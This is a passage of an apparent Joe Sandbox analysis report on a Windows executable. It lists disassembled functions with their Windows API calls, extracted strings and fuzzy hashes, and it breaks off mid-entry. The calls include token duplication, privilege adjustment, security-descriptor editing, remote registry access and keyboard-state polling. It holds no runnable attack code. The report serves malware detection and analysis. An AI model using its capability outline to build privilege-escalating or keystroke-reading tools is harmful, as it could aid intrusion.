_memset.LIBCMT ref: 00A68353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00A683A5
CloseHandle.KERNEL32(?), ref: 00A683B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A683CD
GetProcessWindowStation.USER32 ref: 00A683E6
SetProcessWindowStation.USER32(00000000), ref: 00A683F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A6840A

Part of subcall function 00A681CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A68309), ref: 00A681E0
Part of subcall function 00A681CB: CloseHandle.KERNEL32(?,?,00A68309), ref: 00A681F2

Strings

default, xrefs: 00A68405
, xrefs: 00A68362
winsta0, xrefs: 00A683C8

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 3e6a2e44352287e9f9e151c5ca86990ad012e07d63c8efe6bd5b423150dbdd48
Instruction ID: 0c47181164a22bad72af8810a3a48c4454a7f89e6926b00fa6b11351df753422
Opcode Fuzzy Hash: 3e6a2e44352287e9f9e151c5ca86990ad012e07d63c8efe6bd5b423150dbdd48
Instruction Fuzzy Hash: 61816B71900249AFDF11DFA4CD49AEEBBBCFF04304F14426AF915A62A1DB398E15DB20

Function 00A7C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A7C78D
FindClose.KERNEL32(00000000), ref: 00A7C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A7C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A7C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00A7C844
__swprintf.LIBCMT ref: 00A7C890
__swprintf.LIBCMT ref: 00A7C8D3

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

__swprintf.LIBCMT ref: 00A7C927

Part of subcall function 00A33698: __woutput_l.LIBCMT ref: 00A336F1

__swprintf.LIBCMT ref: 00A7C975

Part of subcall function 00A33698: __flsbuf.LIBCMT ref: 00A33713
Part of subcall function 00A33698: __flsbuf.LIBCMT ref: 00A3372B

__swprintf.LIBCMT ref: 00A7C9C4
__swprintf.LIBCMT ref: 00A7CA13
__swprintf.LIBCMT ref: 00A7CA62

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00A7C88A
%4d, xrefs: 00A7C8CD
%02d, xrefs: 00A7C91B, 00A7C925, 00A7C973, 00A7C9C2, 00A7CA11, 00A7CA60

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: aeed4d3e7f8450aa3da16fb7b065ce4f162e4bf7cd9fda8f1269b506cd0532b2
Instruction ID: ac8934d7c78dc8ab1e09ac95fc68cc66c1a87edf1d0673b097ea71ea19661054
Opcode Fuzzy Hash: aeed4d3e7f8450aa3da16fb7b065ce4f162e4bf7cd9fda8f1269b506cd0532b2
Instruction Fuzzy Hash: 45A11BB2508204ABC710EFA4C996DEFB7ECBF98700F40491EF595C6191EB34DA49CB62

Function 00A7EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00A7EFB6
_wcscmp.LIBCMT ref: 00A7EFCB
_wcscmp.LIBCMT ref: 00A7EFE2
GetFileAttributesW.KERNEL32(?), ref: 00A7EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 00A7F00E
FindNextFileW.KERNEL32(00000000,?), ref: 00A7F026
FindClose.KERNEL32(00000000), ref: 00A7F031
FindFirstFileW.KERNEL32(*.*,?), ref: 00A7F04D
_wcscmp.LIBCMT ref: 00A7F074
_wcscmp.LIBCMT ref: 00A7F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 00A7F09D
SetCurrentDirectoryW.KERNEL32(00AC8920), ref: 00A7F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A7F0C5
FindClose.KERNEL32(00000000), ref: 00A7F0D2
FindClose.KERNEL32(00000000), ref: 00A7F0E4

Strings

*.*, xrefs: 00A7F048

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 1bf5dc5e44569686c0d538b62c3abc8b6448824b19b4843d3036cd006ca0dd52
Instruction ID: 4553ada9903c32119d5d8be0913791287cd654b85b967a36e5de08e8db18997f
Opcode Fuzzy Hash: 1bf5dc5e44569686c0d538b62c3abc8b6448824b19b4843d3036cd006ca0dd52
Instruction Fuzzy Hash: D73180326012197EDF14DBB4EC49AEE77ACAF48360F148176E818D3191EB74DB46CA61

Function 00A90857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A90953
RegCreateKeyExW.ADVAPI32(?,?,00000000,00A9F910,00000000,?,00000000,?,?), ref: 00A909C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00A90A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00A90A92
RegCloseKey.ADVAPI32(?), ref: 00A90DB2
RegCloseKey.ADVAPI32(00000000), ref: 00A90DBF

Strings

REG_BINARY, xrefs: 00A90D4D
REG_EXPAND_SZ, xrefs: 00A90A2F
REG_SZ, xrefs: 00A90AD0
REG_DWORD, xrefs: 00A90C83
REG_MULTI_SZ, xrefs: 00A90B7A
REG_QWORD, xrefs: 00A90D00

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 5a0b95c6a22431d0e730c932e459a009599d3405100e27124de25a3a2bb76f5d
Instruction ID: 77337c2280024e4d92c9eadad9dde14ead04a3bd320ab7273f8a856b56994f20
Opcode Fuzzy Hash: 5a0b95c6a22431d0e730c932e459a009599d3405100e27124de25a3a2bb76f5d
Instruction Fuzzy Hash: D90269756006119FCB14EF28C991E6AB7E9FF89314F04885DF89A9B362DB30ED41CB81

Function 00A7F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00A7F113
_wcscmp.LIBCMT ref: 00A7F128
_wcscmp.LIBCMT ref: 00A7F13F

Part of subcall function 00A74385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A743A0

FindNextFileW.KERNEL32(00000000,?), ref: 00A7F16E
FindClose.KERNEL32(00000000), ref: 00A7F179
FindFirstFileW.KERNEL32(*.*,?), ref: 00A7F195
_wcscmp.LIBCMT ref: 00A7F1BC
_wcscmp.LIBCMT ref: 00A7F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 00A7F1E5
SetCurrentDirectoryW.KERNEL32(00AC8920), ref: 00A7F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A7F20D
FindClose.KERNEL32(00000000), ref: 00A7F21A
FindClose.KERNEL32(00000000), ref: 00A7F22C

Strings

*.*, xrefs: 00A7F190

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: d58b384054258de3b6d21002f3c77cd5245aceba7949f45b6d650b331e8bae4b
Instruction ID: 8f1f6e521ca3f6f1ee1e17697383d961339496fff1be07cca3b658aa5c35426f
Opcode Fuzzy Hash: d58b384054258de3b6d21002f3c77cd5245aceba7949f45b6d650b331e8bae4b
Instruction Fuzzy Hash: 1931A436600219BEDF10DBB4EC49EEE77ACAF45360F148176E918E2091DB30DF45CA94

Function 00A7A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A7A20F
__swprintf.LIBCMT ref: 00A7A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 00A7A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A7A293
_memset.LIBCMT ref: 00A7A2B2
_wcsncpy.LIBCMT ref: 00A7A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A7A323
CloseHandle.KERNEL32(00000000), ref: 00A7A32E
RemoveDirectoryW.KERNEL32(?), ref: 00A7A337
CloseHandle.KERNEL32(00000000), ref: 00A7A341

Strings

\??\%s, xrefs: 00A7A22B
:, xrefs: 00A7A252
\, xrefs: 00A7A247

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: a7c97f28da76fdcec3c17983e7c5702bfa285e5799ecff2518b7f847f67740b5
Instruction ID: db4653ea6d81fd74c2b6a9697e4cb72558491b9783380961213c79f98d8c2391
Opcode Fuzzy Hash: a7c97f28da76fdcec3c17983e7c5702bfa285e5799ecff2518b7f847f67740b5
Instruction Fuzzy Hash: D731AEB5A04109BBDB20DFA0DC49FEF37BCAF88740F1081B6F508D6161EB7496458B65

Function 00A67CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A68202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A6821E
Part of subcall function 00A68202: GetLastError.KERNEL32(?,00A67CE2,?,?,?), ref: 00A68228
Part of subcall function 00A68202: GetProcessHeap.KERNEL32(00000008,?,?,00A67CE2,?,?,?), ref: 00A68237
Part of subcall function 00A68202: HeapAlloc.KERNEL32(00000000,?,00A67CE2,?,?,?), ref: 00A6823E
Part of subcall function 00A68202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A68255

Part of subcall function 00A6829F: GetProcessHeap.KERNEL32(00000008,00A67CF8,00000000,00000000,?,00A67CF8,?), ref: 00A682AB
Part of subcall function 00A6829F: HeapAlloc.KERNEL32(00000000,?,00A67CF8,?), ref: 00A682B2
Part of subcall function 00A6829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A67CF8,?), ref: 00A682C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A67D13
_memset.LIBCMT ref: 00A67D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A67D47
GetLengthSid.ADVAPI32(?), ref: 00A67D58
GetAce.ADVAPI32(?,00000000,?), ref: 00A67D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A67DB1
GetLengthSid.ADVAPI32(?), ref: 00A67DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A67DDD
HeapAlloc.KERNEL32(00000000), ref: 00A67DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A67E05
CopySid.ADVAPI32(00000000), ref: 00A67E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A67E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A67E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A67E77

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 5a9c3e78912b8cac5252c5dbc1394f3a2db790dc736b9b6d9439b4b381d43003
Instruction ID: 8c36c38d8733abf7f9f6f6410a47140e426bc05ef28aa44767f41b81c342e522
Opcode Fuzzy Hash: 5a9c3e78912b8cac5252c5dbc1394f3a2db790dc736b9b6d9439b4b381d43003
Instruction Fuzzy Hash: 06613B71A04209EFDF00DFA5DC45AEEBB79FF04304F14826AF915E6291EB359A16CB60

Function 00A266E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON

Download Yara Rule

Strings

CR), xrefs: 00A61287
UTF16), xrefs: 00A610CF
LIMIT_RECURSION=, xrefs: 00A611FC
ANYCRLF), xrefs: 00A612FB
UCP), xrefs: 00A6110D
LF), xrefs: 00A612A4
ANY), xrefs: 00A612DE
NO_START_OPT), xrefs: 00A6114F
CRLF), xrefs: 00A612C1
BSR_ANYCRLF), xrefs: 00A6131E
NO_AUTO_POSSESS), xrefs: 00A6112E
UTF), xrefs: 00A610FA
LIMIT_MATCH=, xrefs: 00A61170
BSR_UNICODE), xrefs: 00A61338

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 6b534a7ff1b045f59cd68c22be8ae8c90fa68991592be3c688a9d6da085ae955
Instruction ID: 7598ebe3a42508349da24ebecc82fff9353d48402a0fa4ab167d8b6d0c785142
Opcode Fuzzy Hash: 6b534a7ff1b045f59cd68c22be8ae8c90fa68991592be3c688a9d6da085ae955
Instruction Fuzzy Hash: E8727175E01229DBDF14DF59D8807AEBBB5FF48710F14816AE806EB291EB349D81CB90

Function 00A7001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00A70097
SetKeyboardState.USER32(?), ref: 00A70102
GetAsyncKeyState.USER32(000000A0), ref: 00A70122
GetKeyState.USER32(000000A0), ref: 00A70139
GetAsyncKeyState.USER32(000000A1), ref: 00A70168
GetKeyState.USER32(000000A1), ref: 00A70179
GetAsyncKeyState.USER32(00000011), ref: 00A701A5
GetKeyState.USER32(00000011), ref: 00A701B3
GetAsyncKeyState.USER32(00000012), ref: 00A701DC
GetKeyState.USER32(00000012), ref: 00A701EA
GetAsyncKeyState.USER32(0000005B), ref: 00A70213
GetKeyState.USER32(0000005B), ref: 00A70221

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 70336cfb3a407afdabc4786cd4559816202ec3309fc0ea262d9f44bd6b65e3e6
Instruction ID: 757473c070e60cd2d57e88ef872bd69988c5e0f40f2fdd453f3132c2c0539356
Opcode Fuzzy Hash: 70336cfb3a407afdabc4786cd4559816202ec3309fc0ea262d9f44bd6b65e3e6
Instruction Fuzzy Hash: A951FC20A0478899FB35DBB08D14FEABFB49F11380F48C59ED5CA565C3DAA49B8CC761

Function 00A903DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A8FDAD,?,?), ref: 00A90E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A904AC

Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A9054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A905E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00A90822
RegCloseKey.ADVAPI32(00000000), ref: 00A9082F

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 04a1c664f3550651fc30a97c9d9892b165cba4ca04becdf2be4944a7b1dd7c74
Instruction ID: e39b736a313cfdbbf4f55331d341a2049620a79f88ec93f9ca4e7ac128dc885a
Opcode Fuzzy Hash: 04a1c664f3550651fc30a97c9d9892b165cba4ca04becdf2be4944a7b1dd7c74
Instruction Fuzzy Hash: 4AE14C31604210AFCB14DF68C995E6ABBF9EF89354F04896DF84ADB261DB30E941CB91

Function 00A883BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC

CoInitialize.OLE32 ref: 00A88403
CoUninitialize.OLE32 ref: 00A8840E
CoCreateInstance.OLE32(?,00000000,00000017,00AA2BEC,?), ref: 00A8846E
IIDFromString.OLE32(?,?), ref: 00A884E1
VariantInit.OLEAUT32(?), ref: 00A8857B
VariantClear.OLEAUT32(?), ref: 00A885DC

Strings

Invalid parameter, xrefs: 00A884FA
NULL Pointer assignment, xrefs: 00A884B3
Failed to create object, xrefs: 00A88479, 00A8852F

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 95349b77805069367c09fb1d68f932893ab3dc9066cc53556564051d88175618
Instruction ID: 564413bbe8f4773d9bfc19a8ba2b8fb557f0bb85259c01675dbfef0b7c428158
Opcode Fuzzy Hash: 95349b77805069367c09fb1d68f932893ab3dc9066cc53556564051d88175618
Instruction Fuzzy Hash: FB619B71608312AFC714EF64C948F6ABBE8AF49754F40481DF9869B291CF78ED44CB92

Function 00A84164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00A8418B
EmptyClipboard.USER32 ref: 00A84191
GlobalAlloc.KERNEL32(00000002,?), ref: 00A841A6
CloseClipboard.USER32 ref: 00A84245

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: b5fa6c38dc07309f43f506a7ac0532cbd5576ac0e1b43c2a369a71a967b36df2
Instruction ID: eba458984965f7596c1c7e701b0f631cce6256b1a6b4fd2744ed46442556a091
